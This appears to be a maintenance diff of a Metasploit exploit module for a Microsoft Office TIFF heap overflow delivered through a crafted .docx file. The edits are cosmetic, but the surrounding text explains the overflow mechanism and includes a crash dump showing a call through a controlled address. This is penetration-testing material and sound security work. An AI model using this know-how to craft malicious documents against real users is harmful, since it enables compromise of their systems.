@@ -1,9 +1,8 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
 require 'rex/zip'
 require 'nokogiri'
 
@@ -42,8 +41,8 @@ class MetasploitModule < Msf::Exploit::Remote
           The flaw is due to a DWORD value extracted from the TIFF file that is embedded as a
           drawing in Microsoft Office, and how it gets calculated with user-controlled inputs,
           and stored in the EAX register. The 32-bit register will run out of storage space to
-          represent the large vlaue, which ends up being 0, but it still gets pushed as a
-          dwBytes argumenet (size) for a HeapAlloc call. The HeapAlloc function will allocate a
+          represent the large value, which ends up being 0, but it still gets pushed as a
+          dwBytes argument (size) for a HeapAlloc call. The HeapAlloc function will allocate a
           chunk anyway with size 0, and the address of this chunk is used as the destination buffer
           of a memcpy function, where the source buffer is the EXIF data (an extended image format
           supported by TIFF), and is also user-controlled. A function pointer in the chunk returned
@@ -92,7 +91,7 @@ class MetasploitModule < Msf::Exploit::Remote
       register_options(
         [
           OptString.new('FILENAME', [true, 'The docx file', 'msf.docx']),
-        ], self.class)
+        ])
   end
 
   #
@@ -873,7 +872,6 @@ class MetasploitModule < Msf::Exploit::Remote
     docx = make_docx(path)
     file_create(docx)
   end
-
 end
 
 =begin
@@ -885,7 +883,7 @@ cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010286
 OGL!GdipCreatePath+0x58:
 44023a2a ff5050          call    dword ptr [eax+50h]  ds:0023:41424344=????????
 0:000> k
-ChildEBP RetAddr  
+ChildEBP RetAddr
 WARNING: Stack unwind information not available. Following frames may be wrong.
 0011fd98 437a9681 OGL!GdipCreatePath+0x58
 0011fdc8 437b11b0 gfx+0x9681
@@ -909,6 +907,6 @@ WARNING: Stack unwind information not available. Following frames may be wrong.
 00120afc 3175400b wwlib!GetAllocCounters+0x6dc9d
 
   To-do:
-  Turn the docx packaging into a mixin. Good luck with that. 
-  
+  Turn the docx packaging into a mixin. Good luck with that.
+
 =end
